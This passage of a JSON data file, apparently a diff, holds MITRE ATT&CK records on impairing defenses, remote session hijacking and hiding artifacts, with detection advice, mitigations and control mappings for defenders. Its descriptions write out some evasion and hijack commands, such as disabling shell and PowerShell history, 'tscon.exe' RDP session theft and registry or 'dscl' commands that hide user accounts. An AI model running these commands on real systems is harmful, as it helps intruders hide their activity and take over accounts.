"M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.003", + "name": "Impair Defenses: Impair Command History Logging", + "url": "https://attack.mitre.org/techniques/T1562/003", + "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ", + "mitigations": [ + { + "mid": "M1039", + "name": "Environment Variable Permissions", + "description": "Prevent modification of environment variables by unauthorized users and groups.", + "url": "https://attack.mitre.org/mitigations/M1039" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1562.004", + "name": "Impair Defenses: Disable or Modify System Firewall", + "url": "https://attack.mitre.org/techniques/T1562/004", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ", + "detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.006", + "name": "Impair Defenses: Indicator Blocking", + "url": "https://attack.mitre.org/techniques/T1562/006", + "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ", + "detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.007", + "name": "Impair Defenses: Disable or Modify Cloud Firewall", + "url": "https://attack.mitre.org/techniques/T1562/007", + "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.", + "detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.008", + "name": "Impair Defenses: Disable Cloud Logs", + "url": "https://attack.mitre.org/techniques/T1562/008", + "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)", + "detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.009", + "name": "Impair Defenses: Safe Mode Boot", + "url": "https://attack.mitre.org/techniques/T1562/009", + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", + "detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1562.010", + "name": "Impair Defenses: Downgrade Attack", + "url": "https://attack.mitre.org/techniques/T1562/010", + "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\n\nAdversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)", + "detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 3.5914761904761905, + "adjusted_score": 3.5914761904761905, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-4", + "RA-5", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": true + }, + { + "tid": "T1563", + "name": "Remote Service Session Hijacking", + "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)", + "url": "https://attack.mitre.org/techniques/T1563", + "tactics": [ + "Lateral Movement" + ], + "detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1563.001", + "name": "Remote Service Session Hijacking: SSH Hijacking", + "url": "https://attack.mitre.org/techniques/T1563/001", + "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1563.002", + "name": "Remote Service Session Hijacking: RDP Hijacking", + "url": "https://attack.mitre.org/techniques/T1563/002", + "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)", + "detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.7214324169152382, + "adjusted_score": 0.7214324169152382, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.3,6.1,6.2,6.8,7.6,12.2,12.8,18.3,18.5,16.10" + ], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-4", + "IA-6", + "RA-5", + "SC-46", + "SC-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1564", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", + "url": "https://attack.mitre.org/techniques/T1564", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", + "platforms": [ + "Linux", + "Office 365", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "File: File Creation", + "File: File Metadata", + "File: File Modification", + "Firmware: Firmware Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution", + "Service: Service Creation", + "User Account: User Account Creation", + "User Account: User Account Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1564.001", + "name": "Hide Artifacts: Hidden Files and Directories", + "url": "https://attack.mitre.org/techniques/T1564/001", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "mitigations": [] + }, + { + "tid": "T1564.002", + "name": "Hide Artifacts: Hidden Users", + "url": "https://attack.mitre.org/techniques/T1564/002", + "description": "Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\n\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\n\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)", + "detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1564.003", + "name": "Hide Artifacts: Hidden Window", + "url": "https://attack.mitre.org/techniques/T1564/003", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)", + "detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1564.004", + "name": "Hide Artifacts: NTFS File Attributes", + "url": "https://attack.mitre.org/techniques/T1564/004", + "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", + "detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1564.005", + "name": "Hide Artifacts: Hidden File System", + "url": "https://attack.mitre.org/techniques/T1564/005", + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 